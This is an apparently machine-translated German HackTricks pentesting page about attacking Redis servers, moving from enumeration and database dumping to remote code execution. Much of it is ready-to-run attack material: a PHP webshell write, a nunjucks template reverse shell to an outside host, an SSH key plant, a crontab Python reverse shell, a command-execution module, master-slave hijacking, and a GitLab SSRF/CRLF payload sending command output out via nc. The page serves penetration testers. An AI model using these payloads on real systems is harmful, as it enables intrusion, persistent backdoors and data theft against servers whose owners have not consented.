6379 - Pentesting Redis

Lernen & üben Sie AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Lernen & üben Sie GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Überprüfen Sie die Abonnementpläne!
Treten Sie der 💬 Discord-Gruppe oder der Telegram-Gruppe bei oder folgen Sie uns auf Twitter 🐦 @hacktricks_live.
Teilen Sie Hacking-Tricks, indem Sie PRs an die HackTricks und HackTricks Cloud GitHub-Repos senden.

Treten Sie dem HackenProof Discord Server bei, um mit erfahrenen Hackern und Bug-Bounty-Jägern zu kommunizieren!

Hacking Einblicke Engagieren Sie sich mit Inhalten, die in den Nervenkitzel und die Herausforderungen des Hackens eintauchen

Echtzeit-Hack-Nachrichten Bleiben Sie auf dem Laufenden über die schnelllebige Hacking-Welt durch Echtzeitnachrichten und Einblicke

Neueste Ankündigungen Bleiben Sie informiert über die neuesten Bug-Bounties und wichtige Plattform-Updates

Treten Sie uns auf Discord bei und beginnen Sie noch heute mit der Zusammenarbeit mit den besten Hackern!

Grundinformationen

Aus den Dokumenten: Redis ist ein Open-Source (BSD-lizenziert), in-memory Datenstruktur-Store, der als Datenbank, Cache und Nachrichtenbroker verwendet wird.

Standardmäßig verwendet Redis ein textbasiertes Protokoll, aber Sie müssen beachten, dass es auch ssl/tls implementieren kann. Erfahren Sie, wie Sie Redis mit ssl/tls hier ausführen.

Standardport: 6379

PORT     STATE SERVICE  VERSION
6379/tcp open  redis   Redis key-value store 4.0.9

Automatische Aufzählung

Einige automatisierte Tools, die helfen können, Informationen von einer Redis-Instanz zu erhalten:

nmap --script redis-info -sV -p 6379 <IP>
msf> use auxiliary/scanner/redis/redis_server

Manuelle Enumeration

Banner

Redis ist ein textbasiertes Protokoll, Sie können einfach den Befehl in einem Socket senden und die zurückgegebenen Werte sind lesbar. Denken Sie auch daran, dass Redis mit ssl/tls betrieben werden kann (aber das ist sehr ungewöhnlich).

In einer regulären Redis-Instanz können Sie einfach mit nc verbinden oder Sie könnten auch redis-cli verwenden:

nc -vn 10.10.10.10 6379
redis-cli -h 10.10.10.10 # sudo apt-get install redis-tools

Der erste Befehl, den Sie ausprobieren könnten, ist info. Er kann Ausgaben mit Informationen über die Redis-Instanz oder etwas wie das Folgende zurückgeben:

-NOAUTH Authentication required.

In diesem letzten Fall bedeutet dies, dass Sie gültige Anmeldeinformationen benötigen, um auf die Redis-Instanz zuzugreifen.

Redis-Authentifizierung

Standardmäßig kann Redis ohne Anmeldeinformationen zugegriffen werden. Es kann jedoch konfiguriert werden, um nur Passwort oder Benutzername + Passwort zu unterstützen. Es ist möglich, ein Passwort in der redis.conf-Datei mit dem Parameter requirepass oder vorübergehend bis zum Neustart des Dienstes festzulegen, indem man sich mit ihm verbindet und Folgendes ausführt: config set requirepass p@ss$12E45. Außerdem kann ein Benutzername im Parameter masteruser innerhalb der redis.conf-Datei konfiguriert werden.

Wenn nur ein Passwort konfiguriert ist, wird der verwendete Benutzername "default" sein. Beachten Sie auch, dass es keinen Weg gibt, extern zu erkennen, ob Redis nur mit Passwort oder Benutzername+Passwort konfiguriert wurde.

In Fällen wie diesem müssen Sie gültige Anmeldeinformationen finden, um mit Redis zu interagieren, sodass Sie versuchen könnten, es brute-force zu machen. Falls Sie gültige Anmeldeinformationen gefunden haben, müssen Sie die Sitzung authentifizieren, nachdem Sie die Verbindung mit dem Befehl hergestellt haben:

AUTH <username> <password>

Gültige Anmeldeinformationen werden mit folgendem beantwortet: +OK

Authentifizierte Enumeration

Wenn der Redis-Server anonyme Verbindungen zulässt oder wenn Sie gültige Anmeldeinformationen erhalten haben, können Sie den Enumerationsprozess für den Dienst mit den folgenden Befehlen starten:

INFO
[ ... Redis response with info ... ]
client list
[ ... Redis response with connected clients ... ]
CONFIG GET *
[ ... Get config ... ]

Andere Redis-Befehle finden Sie hier und hier.

Beachten Sie, dass die Redis-Befehle einer Instanz umbenannt oder in der redis.conf Datei entfernt werden können. Zum Beispiel wird diese Zeile den Befehl FLUSHDB entfernen:

rename-command FLUSHDB ""

Mehr über die sichere Konfiguration eines Redis-Dienstes hier: https://www.digitalocean.com/community/tutorials/how-to-install-and-secure-redis-on-ubuntu-18-04

Sie können auch in Echtzeit die ausgeführten Redis-Befehle überwachen mit dem Befehl monitor oder die 25 langsamsten Abfragen mit slowlog get 25 abrufen.

Finden Sie hier weitere interessante Informationen zu weiteren Redis-Befehlen: https://lzone.de/cheat-sheet/Redis

Datenbank dumpen

Innerhalb von Redis sind die Datenbanken Zahlen, die bei 0 beginnen. Sie können herausfinden, ob jemand verwendet wird, indem Sie die Ausgabe des Befehls info im Abschnitt "Keyspace" überprüfen:

Oder Sie können einfach alle Keyspaces (Datenbanken) mit folgendem Befehl abrufen:

INFO keyspace

In diesem Beispiel werden die Datenbanken 0 und 1 verwendet. Datenbank 0 enthält 4 Schlüssel und Datenbank 1 enthält 1. Standardmäßig verwendet Redis Datenbank 0. Um beispielsweise Datenbank 1 zu dumpen, müssen Sie Folgendes tun:

SELECT 1
[ ... Indicate the database ... ]
KEYS *
[ ... Get Keys ... ]
GET <KEY>
[ ... Get Key ... ]

Im Falle, dass Sie den folgenden Fehler -WRONGTYPE Operation against a key holding the wrong kind of value erhalten, während Sie GET <KEY> ausführen, liegt es daran, dass der Schlüssel möglicherweise etwas anderes als eine Zeichenkette oder eine Ganzzahl ist und einen speziellen Operator benötigt, um ihn anzuzeigen.

Um den Typ des Schlüssels zu kennen, verwenden Sie den TYPE Befehl, Beispiel unten für Listen- und Hash-Schlüssel.

TYPE <KEY>
[ ... Type of the Key ... ]
LRANGE <KEY> 0 -1
[ ... Get list items ... ]
HGET <KEY> <FIELD>
[ ... Get hash item ... ]

# If the type used is weird you can always do:
DUMP <key>

Dumpen Sie die Datenbank mit npm redis-dump oder python redis-utils

Treten Sie dem HackenProof Discord Server bei, um mit erfahrenen Hackern und Bug-Bounty-Jägern zu kommunizieren!

Hacking Einblicke Engagieren Sie sich mit Inhalten, die in den Nervenkitzel und die Herausforderungen des Hackens eintauchen

Echtzeit-Hack-Nachrichten Bleiben Sie auf dem Laufenden mit der schnelllebigen Hack-Welt durch Echtzeit-Nachrichten und Einblicke

Neueste Ankündigungen Bleiben Sie informiert über die neuesten Bug-Bounties, die gestartet werden, und wichtige Plattform-Updates

Treten Sie uns bei auf Discord und beginnen Sie noch heute mit den besten Hackern zusammenzuarbeiten!

Redis RCE

Interaktive Shell

redis-rogue-server kann automatisch eine interaktive Shell oder eine Reverse-Shell in Redis(<=5.0.5) erhalten.

./redis-rogue-server.py --rhost <TARGET_IP> --lhost <ACCACKER_IP>

PHP Webshell

Info von hier. Sie müssen den Pfad des Webseitenordners kennen:

root@Urahara:~# redis-cli -h 10.85.0.52
10.85.0.52:6379> config set dir /usr/share/nginx/html
OK
10.85.0.52:6379> config set dbfilename redis.php
OK
10.85.0.52:6379> set test "<?php phpinfo(); ?>"
OK
10.85.0.52:6379> save
OK

Wenn der Webshell-Zugriff fehlschlägt, können Sie die Datenbank nach dem Backup leeren und es erneut versuchen. Denken Sie daran, die Datenbank wiederherzustellen.

Template Webshell

Wie im vorherigen Abschnitt könnten Sie auch eine HTML-Vorlagendatei überschreiben, die von einer Template-Engine interpretiert wird, und eine Shell erhalten.

Zum Beispiel, folgend diesem Bericht, können Sie sehen, dass der Angreifer eine rev shell in einem HTML injiziert hat, das von der nunjucks Template-Engine interpretiert wird:

{{ ({}).constructor.constructor(
"var net = global.process.mainModule.require('net'),
cp = global.process.mainModule.require('child_process'),
sh = cp.spawn('sh', []);
var client = new net.Socket();
client.connect(1234, 'my-server.com', function(){
client.pipe(sh.stdin);
sh.stdout.pipe(client);
sh.stderr.pipe(client);
});"
)()}}

Beachten Sie, dass mehrere Template-Engines die Templates im Speicher cachen, sodass selbst wenn Sie sie überschreiben, das neue nicht ausgeführt wird. In diesen Fällen hat der Entwickler entweder das automatische Neuladen aktiviert oder Sie müssen einen DoS über den Dienst durchführen (und erwarten, dass er automatisch neu gestartet wird).

SSH

Beispiel von hier

Bitte beachten Sie, dass das Ergebnis von config get dir nach anderen manuell ausgeführten Exploit-Befehlen geändert werden kann. Es wird empfohlen, es direkt nach dem Login in Redis auszuführen. In der Ausgabe von config get dir könnten Sie das Home des Redis-Benutzers finden (normalerweise /var/lib/redis oder /home/redis/.ssh), und wenn Sie dies wissen, wissen Sie, wo Sie die Datei authenticated_users schreiben können, um über ssh mit dem Benutzer redis zuzugreifen. Wenn Sie das Home eines anderen gültigen Benutzers kennen, bei dem Sie Schreibberechtigungen haben, können Sie dies ebenfalls ausnutzen:

Generieren Sie ein ssh-Öffentlich-Privat-Schlüsselpaar auf Ihrem PC: ssh-keygen -t rsa
Schreiben Sie den öffentlichen Schlüssel in eine Datei: (echo -e "\n\n"; cat ~/id_rsa.pub; echo -e "\n\n") > spaced_key.txt
Importieren Sie die Datei in Redis: cat spaced_key.txt | redis-cli -h 10.85.0.52 -x set ssh_key
Speichern Sie den öffentlichen Schlüssel in der authorized_keys-Datei auf dem Redis-Server:

root@Urahara:~# redis-cli -h 10.85.0.52
10.85.0.52:6379> config set dir /var/lib/redis/.ssh
OK
10.85.0.52:6379> config set dbfilename "authorized_keys"
OK
10.85.0.52:6379> save
OK

Schließlich können Sie ssh zum Redis-Server mit dem privaten Schlüssel: ssh -i id_rsa redis@10.85.0.52

Diese Technik ist hier automatisiert: https://github.com/Avinash-acid/Redis-Server-Exploit

Crontab

root@Urahara:~# echo -e "\n\n*/1 * * * * /usr/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.85.0.53\",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'\n\n"|redis-cli -h 10.85.0.52 -x set 1
OK
root@Urahara:~# redis-cli -h 10.85.0.52 config set dir /var/spool/cron/crontabs/
OK
root@Urahara:~# redis-cli -h 10.85.0.52 config set dbfilename root
OK
root@Urahara:~# redis-cli -h 10.85.0.52 save
OK

Das letzte Beispiel ist für Ubuntu, für Centos sollte der obige Befehl sein: redis-cli -h 10.85.0.52 config set dir /var/spool/cron/

Diese Methode kann auch verwendet werden, um Bitcoin zu verdienen: yam

Redis-Modul laden

Befolgen Sie die Anweisungen von https://github.com/n0b0dyCN/RedisModules-ExecuteCommand, um ein Redis-Modul zu kompilieren, um beliebige Befehle auszuführen.
Dann benötigen Sie eine Möglichkeit, das kompilierte Modul hochzuladen.
Laden Sie das hochgeladene Modul zur Laufzeit mit MODULE LOAD /path/to/mymodule.so.
Listen Sie die geladenen Module auf, um zu überprüfen, ob es korrekt geladen wurde: MODULE LIST.
Führen Sie Befehle aus:

127.0.0.1:6379> system.exec "id"
"uid=0(root) gid=0(root) groups=0(root)\n"
127.0.0.1:6379> system.exec "whoami"
"root\n"
127.0.0.1:6379> system.rev 127.0.0.1 9999

Entladen Sie das Modul, wann immer Sie möchten: MODULE UNLOAD mymodule.

LUA-Sandbox-Umgehung

Hier können Sie sehen, dass Redis den Befehl EVAL verwendet, um Lua-Code in einer Sandbox auszuführen. Im verlinkten Beitrag können Sie sehen, wie man es missbraucht, indem man die dofile-Funktion verwendet, aber offensichtlich ist dies nicht mehr möglich. Wenn Sie die Lua-Sandbox jedoch umgehen können, könnten Sie beliebige Befehle auf dem System ausführen. Außerdem können Sie im selben Beitrag einige Optionen sehen, um DoS zu verursachen.

Einige CVEs zur Umgehung von LUA:

https://github.com/aodsec/CVE-2022-0543

Master-Slave-Modul

Der Master-Redis synchronisiert alle Operationen automatisch mit dem Slave-Redis, was bedeutet, dass wir die verwundbare Redis als Slave-Redis betrachten können, das mit dem Master-Redis verbunden ist, den wir selbst kontrollieren. Dann können wir den Befehl in unser eigenes Redis eingeben.

master redis : 10.85.0.51 (Hacker's Server)
slave  redis : 10.85.0.52 (Target Vulnerability Server)
A master-slave connection will be established from the slave redis and the master redis:
redis-cli -h 10.85.0.52 -p 6379
slaveof 10.85.0.51 6379
Then you can login to the master redis to control the slave redis:
redis-cli -h 10.85.0.51 -p 6379
set mykey hello
set mykey2 helloworld

SSRF spricht mit Redis

Wenn Sie Klartext-Anfragen an Redis senden können, können Sie mit ihm kommunizieren, da Redis die Anfrage zeilenweise liest und nur mit Fehlern auf die Zeilen antwortet, die es nicht versteht:

-ERR wrong number of arguments for 'get' command
-ERR unknown command 'Host:'
-ERR unknown command 'Accept:'
-ERR unknown command 'Accept-Encoding:'
-ERR unknown command 'Via:'
-ERR unknown command 'Cache-Control:'
-ERR unknown command 'Connection:'

Daher, wenn Sie eine SSRF vuln auf einer Website finden und Sie einige Headers (vielleicht mit einer CRLF vuln) oder POST-Parameter kontrollieren können, werden Sie in der Lage sein, beliebige Befehle an Redis zu senden.

Beispiel: Gitlab SSRF + CRLF zu Shell

In Gitlab11.4.7 wurden eine SSRF-Schwachstelle und eine CRLF entdeckt. Die SSRF-Schwachstelle befand sich in der Importprojekt von URL-Funktionalität, als ein neues Projekt erstellt wurde, und erlaubte den Zugriff auf beliebige IPs in der Form [0:0:0:0:0:ffff:127.0.0.1] (dies wird auf 127.0.0.1 zugreifen), und die CRLF-vuln wurde einfach ausgenutzt, indem %0D%0A-Zeichen zur URL hinzugefügt wurden.

Daher war es möglich, diese Schwachstellen auszunutzen, um mit der Redis-Instanz zu kommunizieren, die Warteschlangen von gitlab verwaltet, und diese Warteschlangen auszunutzen, um Codeausführung zu erhalten. Die Payload für den Missbrauch der Redis-Warteschlange ist:

multi
sadd resque:gitlab:queues system_hook_push
lpush resque:gitlab:queue:system_hook_push "{\"class\":\"GitlabShellWorker\",\"args\":[\"class_eval\",\"open(\'|whoami | nc 192.241.233.143 80\').read\"],\"retry\":3,\"queue\":\"system_hook_push\",\"jid\":\"ad52abc5641173e217eb2e52\",\"created_at\":1513714403.8122594,\"enqueued_at\":1513714403.8129568}"
exec

Und die URL encode Anfrage missbraucht SSRF und CRLF, um ein whoami auszuführen und die Ausgabe über nc zurückzusenden, ist:

git://[0:0:0:0:0:ffff:127.0.0.1]:6379/%0D%0A%20multi%0D%0A%20sadd%20resque%3Agitlab%3Aqueues%20system%5Fhook%5Fpush%0D%0A%20lpush%20resque%3Agitlab%3Aqueue%3Asystem%5Fhook%5Fpush%20%22%7B%5C%22class%5C%22%3A%5C%22GitlabShellWorker%5C%22%2C%5C%22args%5C%22%3A%5B%5C%22class%5Feval%5C%22%2C%5C%22open%28%5C%27%7Ccat%20%2Fflag%20%7C%20nc%20127%2E0%2E0%2E1%202222%5C%27%29%2Eread%5C%22%5D%2C%5C%22retry%5C%22%3A3%2C%5C%22queue%5C%22%3A%5C%22system%5Fhook%5Fpush%5C%22%2C%5C%22jid%5C%22%3A%5C%22ad52abc5641173e217eb2e52%5C%22%2C%5C%22created%5Fat%5C%22%3A1513714403%2E8122594%2C%5C%22enqueued%5Fat%5C%22%3A1513714403%2E8129568%7D%22%0D%0A%20exec%0D%0A%20exec%0D%0A/ssrf123321.git

F aus irgendeinem Grund (wie beim Autor von https://liveoverflow.com/gitlab-11-4-7-remote-code-execution-real-world-ctf-2018/ woher diese Informationen stammen) funktionierte die Ausnutzung mit dem git-Schema und nicht mit dem http-Schema.

Tritt dem HackenProof Discord Server bei, um mit erfahrenen Hackern und Bug-Bounty-Jägern zu kommunizieren!

Hacking Einblicke Engagieren Sie sich mit Inhalten, die in den Nervenkitzel und die Herausforderungen des Hackens eintauchen

Echtzeit-Hack-Nachrichten Bleiben Sie auf dem Laufenden mit der schnelllebigen Hack-Welt durch Echtzeit-Nachrichten und Einblicke

Neueste Ankündigungen Bleiben Sie informiert über die neuesten Bug-Bounties, die gestartet werden, und wichtige Plattform-Updates

Tritt uns bei Discord und beginne noch heute mit den besten Hackern zusammenzuarbeiten!

Unterstützen Sie HackTricks

Überprüfen Sie die Abonnementpläne!
Tritt der 💬 Discord-Gruppe oder der Telegram-Gruppe bei oder folge uns auf Twitter 🐦 @hacktricks_live.
Teilen Sie Hacking-Tricks, indem Sie PRs an die HackTricks und HackTricks Cloud GitHub-Repos senden.

Previous6000 - Pentesting X11 Next8009 - Pentesting Apache JServ Protocol (AJP)

Last updated 4 months ago